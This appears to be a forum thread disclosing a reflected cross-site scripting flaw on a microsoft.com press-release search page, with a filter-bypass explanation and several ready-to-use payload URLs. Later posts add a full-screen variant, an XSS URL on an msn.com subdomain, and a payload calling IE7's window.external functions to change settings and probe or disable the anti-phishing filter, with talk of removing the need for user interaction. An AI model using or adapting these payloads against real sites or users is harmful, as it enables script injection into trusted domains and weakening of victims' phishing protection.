I discovered a microsoft webpage blacklists special character combination input, any english letter(a-z) followed by left angle bracket(<) is not allow, # followed by & is not allow too, expect that, it allows any input. That means we cannot construst any valid HTML tag directly. Does it secure? No, it doesn't. The webpage filters our input only, microsoft, are you kidding? Browser renders your output.

The webpage accept two inputs, the server appends a character T after first one, then appends the second string after character T. That means we can add a left angle bracket at the end of first string to construst a valid HTML tag starts with <T, the rest we put it in the beginning of the second string.

Here is the PoC:
It works on my IE6 and FF1.5.
Move your mouse over the textarea.
http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20onmouseover=%22javascript:alert%28%27xss%27%29

Even though it is obscure, there should be easily to exploit it.
I have tried using Table and TD background Vuln, but it doesn't work in my IE6, anyone know why?
I am glad to see anyone exploit it without interaction.
I am sorry that the webpage is in chinese, I haven't test the english version.

Nice find, Hong! I bet this can be modified to not require user interaction, like you suspected. I think you have found the second XSS issue in Microsoft on the boards ever. They tend to be very secure.

Very nice find.. they seem to employ some very extensive QA for their microsoft.com domain. and third actually, counting yourself and thomaspollet

i dont think the same team secures their other domains though, sudomains in live.com, xbox.com, and http://ie.search.msn.com/migrate.asp?SERVER=%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx still have XSS (msn one previously disclosed by someone else)

If you use something like http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20style=%22position:%20absolute;%20top:%200px;%20left:%200px;%22%20onmouseover=%22alert%28%27xss%27%29
Then the user input is easier to trigger (basically made the textarea fill the while screen)

theres an interesting idea, put forward by maluc in an earlier post with the restriction that the xss had to come from a microsoft domain. just thought i'd mention this as a possible use of this xss. Im sure there are quite alot of things you are able to do from here with the IE7 javascript features.

yeah, whenever you first install IE7 it takes you to a microsoft.com page to set up the Anti-phishing options among other things. If you look in the MSDN .. there's a couple special javascript functions that can turn victim's anti-phishing stuff off.. but only if the function is called from the microsoft.com domain. This XSS should be able to utilize those - i'll have to test.

i guess i should've posted it here instead of in a myspace thread. so moved:

okie, i tested it and you are able to add any language you wish as the default language for IE7 using this link:
http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=%20style=%22xx:expression(window.external.CustomizeSettings(false,false,'is-is')%29

goto http://www.google.com afterwards to verify the change (to icelandic). It's also set to disable the anti-phishing toolbar but doesn't seem to have any effect :/

you can, however, determine whether or not they use the anti-phishing filter with:
if(window.external.PhishingEnabled()) alert('its enabled');

Both of those can only be called from a sub.microsoft.com domain (so msdn.microsoft.com will work too)